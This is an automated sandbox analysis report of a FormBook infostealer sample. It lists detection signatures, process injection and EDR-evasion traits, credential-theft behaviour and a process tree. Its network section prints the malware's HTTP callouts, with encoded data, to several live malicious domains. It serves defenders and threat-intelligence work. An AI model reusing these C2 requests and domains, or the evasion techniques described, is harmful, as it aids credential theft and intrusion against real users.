Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Gd3lOevK672JYIK.zip.exe

Overview

General Information

Sample name:Gd3lOevK672JYIK.zip.exe
Analysis ID:1608114
MD5:8b99899d6d20e4a7922839e0152d8c6b
SHA1:4b52e6f943db82dc9c622d7f3ffb848f467be066
SHA256:78320f7a37d22d4c8c4c6be7c24e8cc3ae65775fdf5e4727fd2d72f5235c11bd
Tags:exezipuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Gd3lOevK672JYIK.zip.exe (PID: 3172 cmdline: "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe" MD5: 8B99899D6D20E4A7922839E0152D8C6B)
    • Gd3lOevK672JYIK.zip.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe" MD5: 8B99899D6D20E4A7922839E0152D8C6B)
    • Gd3lOevK672JYIK.zip.exe (PID: 3872 cmdline: "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe" MD5: 8B99899D6D20E4A7922839E0152D8C6B)
      • TjdgrMPwNLGImh.exe (PID: 712 cmdline: "C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\S8rq617Lx.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • net.exe (PID: 6972 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • TjdgrMPwNLGImh.exe (PID: 1588 cmdline: "C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 5552 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T09:02:36.642486+010028596221Exploit Kit Activity Detected172.67.179.14780192.168.2.657313TCP
                2025-02-06T09:04:34.139507+010028596221Exploit Kit Activity Detected172.67.179.14780192.168.2.657312TCP
                2025-02-06T09:04:39.231885+010028596221Exploit Kit Activity Detected172.67.179.14780192.168.2.657314TCP
                2025-02-06T09:04:41.805416+010028596221Exploit Kit Activity Detected172.67.179.14780192.168.2.657316TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.physicsbrain.xyz/q4l7/Avira URL Cloud: Label: malware
                Source: http://www.mujde.info/tzfg/Avira URL Cloud: Label: malware
                Source: http://www.dangky88kfree.online/klay/Avira URL Cloud: Label: malware
                Source: http://www.dangky88kfree.online/klay/?Wv-0mb=qIEKWIS3DMnk3zTmf0s4Y7Lt2Z2YMhdaLxtBWLQ8PBNEgHFsllo7qGfbjG1Gh25bF4MatMnsGEaOe/p8yLTZcfeme15SQZlhWMUbNNAfwS0puqGCT8Mf4NNIUyvk3MC3iEH+u9E=&fB=y07X1lcxALjAvira URL Cloud: Label: malware
                Source: http://www.physicsbrain.xyz/q4l7/?Wv-0mb=3zHfXB/0mptGp/kd11StXhNCa9oiA5B0cDh52wZsVjtjceHZNSwcTokLEErD8EPYf9KWE7/fq9i8xHcbweVV+K0iCv4MlqMIPoO4Duscgacd1t1t+MPl+/aeQnzsHBkXjnuiif4=&fB=y07X1lcxALjAvira URL Cloud: Label: malware
                Source: http://www.mujde.info/tzfg/?fB=y07X1lcxALj&Wv-0mb=PjLaewYoEo4VGB+R4c5HZF4EOZeUC0UQ0hh4LhwLPNFujMTFN6J3ezPBQ3TU3W12Yt5GTeUL6thjg9JW07tcY5vIr8bQUpKqb+VNrmpnqongAthMQI6diofQf29ZyKSZ0XZ2s50=Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Gd3lOevK672JYIK.zip.exeVirustotal: Detection: 38%Perma Link
                Source: Gd3lOevK672JYIK.zip.exeReversingLabs: Detection: 39%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2641308327.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4645931849.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4643912101.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Gd3lOevK672JYIK.zip.exeJoe Sandbox ML: detected
                Source: Gd3lOevK672JYIK.zip.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Gd3lOevK672JYIK.zip.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: net.pdbUGP source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000003.2737681953.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.0000000001810000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.0000000003020000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2642047366.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2644383474.0000000002E79000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Gd3lOevK672JYIK.zip.exe, Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.0000000001810000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 0000000B.00000002.4654353375.0000000003020000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2642047366.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2644383474.0000000002E79000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: net.pdb source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000003.2737681953.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TjdgrMPwNLGImh.exe, 0000000A.00000000.2563425890.000000000085F000.00000002.00000001.01000000.0000000C.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714217135.000000000085F000.00000002.00000001.01000000.0000000C.sdmp
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0281C680 FindFirstFileW,FindNextFileW,FindClose,11_2_0281C680
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then xor eax, eax11_2_02809E40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then pop edi11_2_0280E248
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then mov ebx, 00000004h11_2_02E704E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 172.67.179.147:80 -> 192.168.2.6:57316
                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 172.67.179.147:80 -> 192.168.2.6:57314
                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 172.67.179.147:80 -> 192.168.2.6:57312
                Source: Network trafficSuricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 172.67.179.147:80 -> 192.168.2.6:57313
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.erectus.xyz
                Source: DNS query: www.iquery.xyz
                Source: DNS query: www.physicsbrain.xyz
                Source: DNS query: www.superhoroz.xyz
                Source: global trafficTCP traffic: 192.168.2.6:57139 -> 1.1.1.1:53
                Source: Joe Sandbox ViewIP Address: 192.64.118.221 192.64.118.221
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /9kj6/?Wv-0mb=AVccbOSLL/+N4XgxWpbST2GRql+zePew8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeSRa2ctgh7q7sNexMEHtqMe57bNjGpdeQbciM2ERUCv8rawtCjHo=&fB=y07X1lcxALj HTTP/1.1Host: www.cloud-kuprof2.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cjko/?Wv-0mb=3gJzY2hwuTATu+whP7Mcbn4uPYsAIhg05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBpdeGUzUPioxCZrmYWiqCwfNJbiKEcBQwHfIM5mtNggh01wsvlSM=&fB=y07X1lcxALj HTTP/1.1Host: www.erectus.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6wg4/?Wv-0mb=e2yux1VtJoqvcqg//AuOd1cW9ptpoBLl/1eDxHdMS7mzrr0SxU8linEjJM3sYoPzrw66qF8Oj5XhrJTjkHQqss38I2AsCBb/dd+vVDhzv64ErVrlMRO2uWY5VclBwacLuBdPO4k=&fB=y07X1lcxALj HTTP/1.1Host: www.globalcase.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wurw/?Wv-0mb=AnTV2PZB96hzeGpdox3R1euC5tJ7j9BP6MTRc/0V7XuIxOJUDZ8vHF+lgPe4wRgEiNKqti0MezvZBz/rkSMGvqLqrCXstXc3JK14B1Rwu/r+C09KpsX0ZbQOVRwa1Pnh6LUbv0I=&fB=y07X1lcxALj HTTP/1.1Host: www.adjokctp.icuAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2o8m/?Wv-0mb=bm7QAD20mCnoHtbaL/8YgQ7YhFXapF90rUedqgqpBEM6BLNZ+jEX2t/OtKPUsXWFAKe8np5Co20a6f85QZVrQUSa8C/9p2HJ/w+PSu0LA/6v5Gf3dSbQTxP6bMtcP8dRDaIfQ4g=&fB=y07X1lcxALj HTTP/1.1Host: www.iquery.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /q4l7/?Wv-0mb=3zHfXB/0mptGp/kd11StXhNCa9oiA5B0cDh52wZsVjtjceHZNSwcTokLEErD8EPYf9KWE7/fq9i8xHcbweVV+K0iCv4MlqMIPoO4Duscgacd1t1t+MPl+/aeQnzsHBkXjnuiif4=&fB=y07X1lcxALj HTTP/1.1Host: www.physicsbrain.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gyh1/?Wv-0mb=A7NsjztG1NbQPpI9ZE7lcKBsTxmGtiXMPkShtAkJJXgPiqJ6q1NZppBagIaRERqDgecHQkyweHxfC5gidOqMBIv8TuneLvGkNtr8ty+s6hiiQYO4eAf0be5bhISlMvPBeud7vN0=&fB=y07X1lcxALj HTTP/1.1Host: www.grcgrg.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7r14/?fB=y07X1lcxALj&Wv-0mb=IoQ5FJRh4G5Ptnd6160xMDz25cCUcBa0AKfr5xy7yi7UDONnCkf5gNgCLKsRqKS7IR6ZRfHXpFlTFed3aPY1ae3orGnVU0349RymPmchXrjsGvNzD2nfbx0i7mHL3KHjMRCwiXU= HTTP/1.1Host: www.superhoroz.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /nh5f/?Wv-0mb=JrL/TbLCLlUUoPres93CZ7BnahiysxfIwFNLPYkkDhkuyQg5g6SEms/XeZ/xBHJgqd48M73/xhuXnH0xKRzU6Oogd517fpg0YoX/abOo12GeT+j38frxAPE3OzbludBpgjYFr8Q=&fB=y07X1lcxALj HTTP/1.1Host: www.tumbetgirislinki.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /tzfg/?fB=y07X1lcxALj&Wv-0mb=PjLaewYoEo4VGB+R4c5HZF4EOZeUC0UQ0hh4LhwLPNFujMTFN6J3ezPBQ3TU3W12Yt5GTeUL6thjg9JW07tcY5vIr8bQUpKqb+VNrmpnqongAthMQI6diofQf29ZyKSZ0XZ2s50= HTTP/1.1Host: www.mujde.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /oam7/?Wv-0mb=7E/j/USbutW+G3Sfg0Ub1oeY6DmlMSofSR+gNRa1yNEzRcpy2ftaU6LsEmDL3xoGKbYrm/KCiQ74ien4mX6KXc7fB/OaINQmXV2SlvuBgh9jOcJyQ/EVFCBx7lOKcVuMEQjsU7M=&fB=y07X1lcxALj HTTP/1.1Host: www.domuss.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /klay/?Wv-0mb=qIEKWIS3DMnk3zTmf0s4Y7Lt2Z2YMhdaLxtBWLQ8PBNEgHFsllo7qGfbjG1Gh25bF4MatMnsGEaOe/p8yLTZcfeme15SQZlhWMUbNNAfwS0puqGCT8Mf4NNIUyvk3MC3iEH+u9E=&fB=y07X1lcxALj HTTP/1.1Host: www.dangky88kfree.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.cloud-kuprof2.click
                Source: global trafficDNS traffic detected: DNS query: www.erectus.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fineitemrealm.shop
                Source: global trafficDNS traffic detected: DNS query: www.globalcase.website
                Source: global trafficDNS traffic detected: DNS query: www.adjokctp.icu
                Source: global trafficDNS traffic detected: DNS query: www.iquery.xyz
                Source: global trafficDNS traffic detected: DNS query: www.physicsbrain.xyz
                Source: global trafficDNS traffic detected: DNS query: www.grcgrg.net
                Source: global trafficDNS traffic detected: DNS query: www.superhoroz.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tumbetgirislinki.fit
                Source: global trafficDNS traffic detected: DNS query: www.mujde.info
                Source: global trafficDNS traffic detected: DNS query: www.domuss.asia
                Source: global trafficDNS traffic detected: DNS query: www.dangky88kfree.online
                Source: global trafficDNS traffic detected: DNS query: www.jobby.education
                Source: unknownHTTP traffic detected: POST /cjko/ HTTP/1.1Host: www.erectus.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USCache-Control: no-cacheContent-Length: 211Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.erectus.xyzReferer: http://www.erectus.xyz/cjko/User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36Data Raw: 57 76 2d 30 6d 62 3d 36 69 68 54 62 44 55 33 2b 54 4a 33 32 4a 35 66 63 59 41 41 56 57 59 6f 50 62 67 6a 63 67 63 46 39 48 6e 6f 56 6c 6c 35 36 63 58 4e 4f 59 7a 54 46 70 65 59 66 4a 57 66 74 30 4f 4b 53 6f 38 55 41 77 59 38 41 6f 43 45 43 35 64 5a 42 4c 49 4a 31 4d 6a 77 69 2b 54 6e 54 52 38 4f 73 4f 5a 31 63 4f 6d 73 58 7a 43 4d 32 65 4e 4d 66 67 54 6d 63 6c 49 32 50 36 64 61 30 46 78 44 37 53 42 32 31 6d 6f 68 6f 45 76 73 6f 61 72 50 4d 69 66 53 43 43 73 51 4b 50 6c 68 44 2b 38 43 64 47 7a 31 31 2b 4b 72 4c 62 4b 59 58 2f 75 46 48 39 64 6b 4d 44 76 61 69 68 43 6e 49 65 76 49 74 65 4f 47 45 35 7a 68 6d 57 43 51 54 65 55 42 Data Ascii: Wv-0mb=6ihTbDU3+TJ32J5fcYAAVWYoPbgjcgcF9HnoVll56cXNOYzTFpeYfJWft0OKSo8UAwY8AoCEC5dZBLIJ1Mjwi+TnTR8OsOZ1cOmsXzCM2eNMfgTmclI2P6da0FxD7SB21mohoEvsoarPMifSCCsQKPlhD+8CdGz11+KrLbKYX/uFH9dkMDvaihCnIevIteOGE5zhmWCQTeUB
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Thu, 06 Feb 2025 08:03:39 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
